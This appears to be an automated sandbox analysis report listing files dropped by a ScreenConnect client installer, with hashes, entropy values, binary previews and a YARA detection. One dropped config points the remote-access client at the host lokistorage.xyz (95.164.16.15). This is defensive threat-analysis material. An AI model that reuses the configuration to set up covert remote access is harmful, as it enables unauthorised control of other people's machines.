                                                                SHA-512:6D5388F35C0958ACE0EAFDF8E98A3125D2535AC25670C0E13EED6664E9D97B6B2ED48889FD07CE9B74C0E8923C0BB796C537B0F4EB5C76A85B1E24474367ED6F
                                                                Malicious:false
                                                                Preview:<xsl:stylesheet version="1.0"...xmlns:xsl="http://www.w3.org/1999/XSL/Transform"...xmlns:msxsl="urn:schemas-microsoft-com:xslt"...xmlns:asm="urn:schemas-microsoft-com:asm.v1"...xmlns:user="urn:ScreenConnect"...exclude-result-prefixes="msxsl asm user"..>...<xsl:output omit-xml-declaration="yes" encoding="ASCII" />...<xsl:strip-space elements="add remove httpRuntime" />...<xsl:param name="configuration" />...<xsl:param name="platform" />...<xsl:param name="oldVersionMajor" />...<xsl:param name="oldVersionMinor" />...<xsl:param name="version" />...<xsl:param name="utcOffsetMinuteCount" />..... NOTE: this only supports C# 2.0 and .NET Framework 2.0-->... Custom/XslScratchpad is setup with the same C#/.NET configuration to provide full IDE support, so changes should be made/tested there and then copied to this section -->...<msxsl:script language="C#" implements-prefix="user">....<msxsl:using namespace="System.Collections.Generic" />....<msxsl:using namespace="System.Security.Crypto
                                                                Process:C:\Users\user\Desktop\tmpzNIZ0YQ.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BF3035CA-924F-7DEB-610F-14962D2B8EE2}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):13860864
                                                                Entropy (8bit):7.9690051089460985
                                                                Encrypted:false
                                                                SSDEEP:196608:7Zs6Uruc9XbAZs6UYZs6UnZs6UeZs6UvlZs6UvWZs6UvD:7nCtxbAntnEnxn4n1nI
                                                                MD5:896E1759C963366206827870323F8891
                                                                SHA1:7EED7FC0CB4A002DA84EE06EFAA45404AE0623C0
                                                                SHA-256:AC1A559C51DD453DA381CF30691E255EAA103AAC6A97134188F0A7779D815345
                                                                SHA-512:27EB34C2485C4225AE4F329FC7045E795BA0DED74AB22EA008E9C64BD509667DCF10DE30E7760BD40A26A0C8C1B9005AD53F6E7E721EF06512AD781156E65D69
                                                                Malicious:false
                                                                Preview:......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BF3035CA-924F-7DEB-610F-14962D2B8EE2}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):13860864
                                                                Entropy (8bit):7.9690051089460985
                                                                Encrypted:false
                                                                SSDEEP:196608:7Zs6Uruc9XbAZs6UYZs6UnZs6UeZs6UvlZs6UvWZs6UvD:7nCtxbAntnEnxn4n1nI
                                                                MD5:896E1759C963366206827870323F8891
                                                                SHA1:7EED7FC0CB4A002DA84EE06EFAA45404AE0623C0
                                                                SHA-256:AC1A559C51DD453DA381CF30691E255EAA103AAC6A97134188F0A7779D815345
                                                                SHA-512:27EB34C2485C4225AE4F329FC7045E795BA0DED74AB22EA008E9C64BD509667DCF10DE30E7760BD40A26A0C8C1B9005AD53F6E7E721EF06512AD781156E65D69
                                                                Malicious:false
                                                                Preview:......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {BF3035CA-924F-7DEB-610F-14962D2B8EE2}, Create Time/Date: Wed May 29 14:47:46 2024, Last Saved Time/Date: Wed May 29 14:47:46 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                Category:dropped
                                                                Size (bytes):13860864
                                                                Entropy (8bit):7.9690051089460985
                                                                Encrypted:false
                                                                SSDEEP:196608:7Zs6Uruc9XbAZs6UYZs6UnZs6UeZs6UvlZs6UvWZs6UvD:7nCtxbAntnEnxn4n1nI
                                                                MD5:896E1759C963366206827870323F8891
                                                                SHA1:7EED7FC0CB4A002DA84EE06EFAA45404AE0623C0
                                                                SHA-256:AC1A559C51DD453DA381CF30691E255EAA103AAC6A97134188F0A7779D815345
                                                                SHA-512:27EB34C2485C4225AE4F329FC7045E795BA0DED74AB22EA008E9C64BD509667DCF10DE30E7760BD40A26A0C8C1B9005AD53F6E7E721EF06512AD781156E65D69
                                                                Malicious:false
                                                                Preview:......................>...............................................................6...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):423852
                                                                Entropy (8bit):6.576883630545913
                                                                Encrypted:false
                                                                SSDEEP:6144:EuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvM:EuH2anwohwQUv5uH2anwohwQUvM
                                                                MD5:4CA4A0FAB7B33131CE50D4B3D071DC97
                                                                SHA1:722FF44CA9527E738FDA732C19E905E6D4A24CE0
                                                                SHA-256:6947D1DD7598ADEC2D1FD5395765AB8EC7B6D6F30428526739CBABDE3137425B
                                                                SHA-512:EEEAF046DCDCD99597C09711837D06A6D9D1549F222E02FE11CF5B3FE9EE9844BC649F59A17C504357393F4F495ED9B855A8477808D151CC606C060024DA7673
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI8E59.tmp, Author: Joe Security
                                                                Preview:...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}^.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}f.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}c.C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):207360
                                                                Entropy (8bit):6.573348437503042
                                                                Encrypted:false
                                                                SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):207360
                                                                Entropy (8bit):6.573348437503042
                                                                Encrypted:false
                                                                SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.1616720321083702
                                                                Encrypted:false
                                                                SSDEEP:12:JSbX72FjiTSAGiLIlHVRpMh/7777777777777777777777777vDHFbf27Dlp3XlN:JYTSQI5cZ+Hb6F
                                                                MD5:A366AA60383DA880BE9CB95CD844DFAB
                                                                SHA1:2898DF6D1F2A4A1ACED43611D19118FCDE623517
                                                                SHA-256:DA55C7DE9C17E56BD52356EC42D6ABAFF5F0963FB1E49B8DA9CF9E9BDBBED831
                                                                SHA-512:ECEBBF5AD8F7FD713ADC43ACAFEA7B9E62E3916B0725297762265D47DE1FD9E5463F5B00B142A7B56F7E85A0ACAF0F90410C766CB63DA2557FB1A7DD7D73D0FD
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.7979120961169852
                                                                Encrypted:false
                                                                SSDEEP:48:s8PhxuRc06WX4MjT5q4/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgY8:Dhx18jTcCKpKfV0d6l/XtQopASfM4
                                                                MD5:4CD514A5B548DAE443C6B01354E949BD
                                                                SHA1:1F73C085AD8092FDB2D33924F5F18476DBB72A48
                                                                SHA-256:446064E81894B3AAB928C5648C6897374A8C0F5EEA901350900227FC73D3F33D
                                                                SHA-512:9B79C2F6D7C9345086A7DE8A54FEB04D81FB94E41B54F128438B1C09EA66BEA5AE2A00BB472A7D312A065382519097EBDAF354C442F9357735D3ED2D23A0BA6A
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
                                                                Category:dropped
                                                                Size (bytes):435
                                                                Entropy (8bit):5.289734780210945
                                                                Encrypted:false
                                                                SSDEEP:12:Kvv/7tghWPjScQZ/Ev/739Jgh5TZYR/v/71XfghNeZ:QOZZq9JOz0dONeZ
                                                                MD5:F34D51C3C14D1B4840AE9FF6B70B5D2F
                                                                SHA1:C761D3EF26929F173CEB2F8E01C6748EE2249A8A
                                                                SHA-256:0DD459D166F037BB8E531EB2ECEB2B79DE8DBBD7597B05A03C40B9E23E51357A
                                                                SHA-512:D6EEB5345A5A049A87BFBFBBBEBFBD9FBAEC7014DA41DB1C706E8B16DDEC31561679AAE9E8A0847098807412BD1306B9616C8E6FCFED8683B4F33BD05ADE38D1
                                                                Malicious:false
                                                                Preview:..............z...6... ..............00..........0....PNG........IHDR.............(-.S....PLTE....22.u......tRNS.@..f..."IDATx.c` .0"...$.(......SC..Q8....9b.i.Xa.....IEND.B`..PNG........IHDR... ... .....I......PLTE....22.u......tRNS.@..f...(IDATx.c`...... ... D.......vb.....A`..(.-s...q....IEND.B`..PNG........IHDR...0...0.....m.k.....PLTE....22.u......tRNS.@..f...+IDATx.c` .......Q...S.@..DQu...4...(.}DQD...3x........IEND.B`.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):360001
                                                                Entropy (8bit):5.362956963290675
                                                                Encrypted:false
                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaum:zTtbmkExhMJCIpET
                                                                MD5:58AE9ED41EF51D16F007D2B958FBBB99
                                                                SHA1:0E406ECE5CD5BFD18FC35E30A0AE8B018822CD11
                                                                SHA-256:8F1B858B42EF4DDED391C126E24A35C61DDA9EA400A8C66B617EFCC92D5F566B
                                                                SHA-512:1B69EF1488766D8273D207B4822390D2978D713905ADA1B1144CA9D34E23D96EE1971A35AD95EDA7EFC3D9DF726FB99ED2D2C1FCB1A4F1D6EFE9AD7FB074B7BB
                                                                Malicious:false
                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                Process:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):559
                                                                Entropy (8bit):5.045176629686393
                                                                Encrypted:false
                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsQAv/vXbAa3xT:2dL9hK6E46YPpO3vH
                                                                MD5:7AF46EAB522933E5E1520729D07C4BB2
                                                                SHA1:2F00C662DBFC5B812E91ED519549C06CA8B654C4
                                                                SHA-256:48863C6092BC5FFAC80A2B14AB321E4178D07E19B0766641EB623746F2CEE8D0
                                                                SHA-512:D093DE30342199D12158ED7DF2C71F9D9D34DD50052DCFB29028387AA371F8E8EAB23653379408C5BF1A6EEAD4F155635A24A26939265C907822B121F3E5D598
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a25</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                Process:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):559
                                                                Entropy (8bit):5.045176629686393
                                                                Encrypted:false
                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpKozwCDsQAv/vXbAa3xT:2dL9hK6E46YPpO3vH
                                                                MD5:7AF46EAB522933E5E1520729D07C4BB2
                                                                SHA1:2F00C662DBFC5B812E91ED519549C06CA8B654C4
                                                                SHA-256:48863C6092BC5FFAC80A2B14AB321E4178D07E19B0766641EB623746F2CEE8D0
                                                                SHA-512:D093DE30342199D12158ED7DF2C71F9D9D34DD50052DCFB29028387AA371F8E8EAB23653379408C5BF1A6EEAD4F155635A24A26939265C907822B121F3E5D598
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>lokistorage.xyz=95.164.16.15-12%2f11%2f2024%2017%3a40%3a25</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                Process:C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1590
                                                                Entropy (8bit):5.363907225770245
                                                                Encrypted:false
                                                                SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.4191022846140333
                                                                Encrypted:false
                                                                SSDEEP:48:I4JupI+xFX4nT5hU74/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYro:JJcETXyCKpKfV0d6l/XtQopASfM4
                                                                MD5:60AEFF36A78AC0F71A3B5E6D10E6FC51
                                                                SHA1:25959448496FCB3BA2978C7798CE867A43173215
                                                                SHA-256:991C48FDCCEA7E22D6EEBA2776BE030E24C6E56E34BE88CC244E423395545BB5
                                                                SHA-512:D72F49BE72D506860BEF358B29B20D230492D3C7AB4F8850AEA7B229E055F0C25C6B655CBCD82E89A788745B4BCEE838DFA2E6F5753B305F778EE2ACF2A29234
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.7979120961169852
                                                                Encrypted:false
                                                                SSDEEP:48:s8PhxuRc06WX4MjT5q4/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgY8:Dhx18jTcCKpKfV0d6l/XtQopASfM4
                                                                MD5:4CD514A5B548DAE443C6B01354E949BD
                                                                SHA1:1F73C085AD8092FDB2D33924F5F18476DBB72A48
                                                                SHA-256:446064E81894B3AAB928C5648C6897374A8C0F5EEA901350900227FC73D3F33D
                                                                SHA-512:9B79C2F6D7C9345086A7DE8A54FEB04D81FB94E41B54F128438B1C09EA66BEA5AE2A00BB472A7D312A065382519097EBDAF354C442F9357735D3ED2D23A0BA6A
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):0.23370948042339865
                                                                Encrypted:false
                                                                SSDEEP:48:42l1DBAdubS3qcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYrLno4/:429xpKfV0d6l/XtQopASyo
                                                                MD5:41DEFB2A19A485F88F4256A11951975D
                                                                SHA1:EE09858330536351E4269C3B2314CC57C5297FA3
                                                                SHA-256:B0B793858166BEC24F9A0ABC501D2987232F006D79471FEA80CCB342F85A3517
                                                                SHA-512:B9CC563D20E42A3F5DF82FCB806512E46DDF35DA64A9FF1CDABD19CC4FFE2E6AFBF15476783C26190ACC69392A46AA94370D2DC105F04F828573D0FF9BF37446
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3::
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):20480
                                                                Entropy (8bit):1.7979120961169852
                                                                Encrypted:false
                                                                SSDEEP:48:s8PhxuRc06WX4MjT5q4/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgY8:Dhx18jTcCKpKfV0d6l/XtQopASfM4
                                                                MD5:4CD514A5B548DAE443C6B01354E949BD
                                                                SHA1:1F73C085AD8092FDB2D33924F5F18476DBB72A48
                                                                SHA-256:446064E81894B3AAB928C5648C6897374A8C0F5EEA901350900227FC73D3F33D
                                                                SHA-512:9B79C2F6D7C9345086A7DE8A54FEB04D81FB94E41B54F128438B1C09EA66BEA5AE2A00BB472A7D312A065382519097EBDAF354C442F9357735D3ED2D23A0BA6A
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.06905341407124081
                                                                Encrypted:false
                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOuK3f2WTC9pGyVky6l3X:2F0i8n0itFzDHFbf27DE3X
                                                                MD5:9D5EA7035451AAC4CA73E90ED5A86F65
                                                                SHA1:DB316E571CAC8B49566B2905618852C694566983
                                                                SHA-256:4068F403D71E4543DDD4A72F567D8A2057835E7A78C5B4B7DDA0FB9C03187AE5
                                                                SHA-512:8F55C9D06DB5C6777DB5AFDD5604F5D2B34CF79128BC82924849A1B13881396A132EE2C453AB50D247CCFC9139C9ECBCBB71F157BDDEF103D1E89C501932BF3E
                                                                Malicious:false
                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):1.4191022846140333
                                                                Encrypted:false
                                                                SSDEEP:48:I4JupI+xFX4nT5hU74/dnHqcq56AdubSiV0d6S2070B3uQca2iQR6YEwg4pDgYro:JJcETXyCKpKfV0d6l/XtQopASfM4
                                                                MD5:60AEFF36A78AC0F71A3B5E6D10E6FC51
                                                                SHA1:25959448496FCB3BA2978C7798CE867A43173215
                                                                SHA-256:991C48FDCCEA7E22D6EEBA2776BE030E24C6E56E34BE88CC244E423395545BB5
                                                                SHA-512:D72F49BE72D506860BEF358B29B20D230492D3C7AB4F8850AEA7B229E055F0C25C6B655CBCD82E89A788745B4BCEE838DFA2E6F5753B305F778EE2ACF2A29234
                                                                Malicious:false
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
